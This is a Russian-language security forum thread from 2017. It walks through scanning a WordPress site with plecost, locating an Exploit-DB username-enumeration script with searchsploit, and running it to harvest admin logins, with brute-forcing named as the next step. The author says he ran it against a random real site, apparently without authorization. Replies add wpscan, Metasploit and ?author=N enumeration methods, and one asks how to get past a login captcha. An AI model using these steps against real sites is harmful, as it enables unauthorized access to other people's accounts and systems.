1. Наш канал codeby в telegram. Пишем об информационной безопасности, методах защиты информации, о программировании. Не пропускай новости с кодебай, будь в тренде ! Подробнее ...

    Скрыть объявление

Ищем уязвимости в WordPress с помощью plecost

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Inject0r, 28 авг 2017.

Метки:
  1. Inject0r

    Inject0r Well-Known Member

    Репутация:
    1
    Регистрация:
    3 сен 2016
    Сообщения:
    113
    Симпатии:
    169
    Всем привет!

    Сегодня потестируем сканер безопасности Wordpress под названием plecost и проэксплуатируем одну небольшую уязвимость.

    plecost по умолчанию установлен в kali, но почему-то совсем не обновляется и имеет версию аж 0.2.2-9-beta.

    Устанавливаем утилиту:

    apt-get update
    apt-get install python3-pip
    python3 -m pip install plecost
    cd /usr/bin/
    rm plecost
    ln -s /usr/local/bin/plecost plecost

    Убеждаемся, что у нас установилась свежая версия 1.1.1:

    plecost

    Ищем уязвимости в WordPress с помощью plecost

    Сканируем сайт с движком на WordPress:

    plecost <Домен>

    Я произвел сканирование одного случайного сайта на Wordpress, ссылку на который умышленно давать не буду.

    Какую информацию дает на выходе утилита:
    - версия WordPress и список ее уязвимостей;
    - список установленных плагинов, их версии и уязвимости.

    В моем примере был найден движок версии 4.5.0 с объемным списком дыр. А вот установленные плагины оказались безопасными.

    Ищем уязвимости в WordPress с помощью plecost

    Что делать дальше?

    1. Можно пробить все найденные уязвимости на https://www.exploit-db.com

    Например, эксплойт для уязвимости CVE-2016-6897 может выполнить DoS-атаку. Правда для его выполнения необходимо знать логин/пароль от админки.
    Ищем уязвимости в WordPress с помощью plecost

    2. Можно поискать уязвимости в локальной базе Kali через searchsploit

    Обновляем базу:

    searchsploit --update

    Ищем уязвимости для WordPress, исключаем из поиска уязвимости для плагинов и тем, так как в данном примере дыры не найдены:

    searchsploit wordpress | grep -v Plugin | grep -v Theme

    Изучив результаты видим, что для нашей версии 4.5.0 подходит эксплойт Username Enumeration. Давайте его запустим и найдем все логины!

    Ищем уязвимости в WordPress с помощью plecost

    Копируем эксплойт на рабочий стол:

    cd ~/Desktop
    cp /usr/share/exploitdb/platforms/php/webapps/41497.php ~/Desktop/

    Удаляем виндовый символ перевода каретки, иначе скрипт выдаст ошибку:
    cat 41497.php | tr -d '\r' > exploit.php

    Открываем exploit.php в редакторе.

    В первой строчке исправляем ошибку: добавляем после ! знак /
    Далее, переменной url задаем значение с доменом сайта жертвы. После домена обязательно ставим /, иначе скрипт откажется работать.

    Ищем уязвимости в WordPress с помощью plecost

    Сохраняем изменения и запускаем:

    chmod +x exploit.php
    ./exploit.php

    Ищем уязвимости в WordPress с помощью plecost

    В результате мы получаем список логинов для админки WP. Ура! Дальше можно в дело пускать брут :)

    Это моя первая статья, надеюсь, что кому-нибудь она будет полезна :)
     
    #1 Inject0r, 28 авг 2017
    Последнее редактирование: 28 авг 2017
    Vertigo, IioS, Underwood и 4 другим нравится это.
  2. ghostphisher

    ghostphisher гарант codeby
    ELEET

    Репутация:
    8
    Регистрация:
    7 дек 2016
    Сообщения:
    1.817
    Симпатии:
    1.816
    Для вордпресса можно псомотреть логины без скачивания эксплоитов, через впскан.

    wpscan --url site.com --enumerate u и он покажеи и id и логин.
     
    Vertigo нравится это.
  3. sunwayru

    sunwayru New Member

    Репутация:
    0
    Регистрация:
    21 июл 2017
    Сообщения:
    1
    Симпатии:
    0
    Спасибо! Логины знаем, в вход на сайт защищён капчей, что порекомендуете?
     
  4. Ondrik8

    Ondrik8 prodigy
    Red Team

    Репутация:
    12
    Регистрация:
    8 ноя 2016
    Сообщения:
    631
    Симпатии:
    1.670
    отличная статья! ЖГИ!))
     
  5. Inject0r

    Inject0r Well-Known Member

    Репутация:
    1
    Регистрация:
    3 сен 2016
    Сообщения:
    113
    Симпатии:
    169
    Можно и так) Но крутые хакеры легких путей не ищут :)
    --- Добавлено 28 авг 2017. Первое сообщение размещено 28 авг 2017 ---
    Кстати, упустил момент. По умолчанию прога брутит плагины по словарю размером в 50 наименований. У нее есть словарь на 1000 плагинов, чтобы его использовать, нужно ввести команду:

    plecost <домен> -w plugin_list_1000.txt
     
    Underwood, Vertigo и ghostphisher нравится это.
  6. IioS

    IioS Well-Known Member
    Red Team

    Репутация:
    9
    Регистрация:
    9 июн 2017
    Сообщения:
    168
    Симпатии:
    283
    К определению что это WP вот крутой плагин который, меня не раз помогал
    (Только для мозилы, отображается возле значка обновления)
     

    Вложения:

    • Ищем уязвимости в WordPress с помощью plecost
      WP.png
      Размер файла:
      5,6 КБ
      Просмотров:
      10
    Vertigo и WebWare Team нравится это.
  7. Breed

    Breed Well-Known Member

    Репутация:
    1
    Регистрация:
    18 июн 2017
    Сообщения:
    221
    Симпатии:
    243
    Плюс к этому в Metasploit:
    • модуль для определения версии: auxiliary/scanner/http/wordpress_scanner;
    • модуль для определения имени пользователя: auxiliary/scanner/http/wordpress_login_enum.
    А я когда-то, не будучи еще знакомым с Kali и Linux-ом вообще, вручную перебирал в адресной строке:
    Код:
    http://ИМЯ_САЙТА.ru/?author=1
    http://ИМЯ_САЙТА.ru/?author=2
    http://ИМЯ_САЙТА.ru/?author=3
    ....................
    http://ИМЯ_САЙТА.ru/?author=N
    и вычислял цель вручную (ху из ху).
     
    Vertigo, WebWare Team и ghostphisher нравится это.
  8. SlipX

    SlipX dd if=/dev/random of=/dev/port
    Премиум

    Репутация:
    8
    Регистрация:
    13 авг 2017
    Сообщения:
    118
    Симпатии:
    138
    давно это было)
     
  9. Shellmell

    Shellmell New Member

    Репутация:
    0
    Регистрация:
    6 сен 2017
    Сообщения:
    2
    Симпатии:
    0
    Подскажите, пожалуйста, насколько удобно и целесообразно делать это все под виндой?
     
Загрузка...
Похожие Темы - Ищем уязвимости WordPress
  1. Мария Смирнова
    Ответов:
    0
    Просмотров:
    39
  2. Мария Смирнова
    Ответов:
    0
    Просмотров:
    71
  3. jobver
    Ответов:
    0
    Просмотров:
    66
  4. Мария Смирнова
    Ответов:
    0
    Просмотров:
    95
  5. AdaErt
    Ответов:
    0
    Просмотров:
    104

Поделиться этой страницей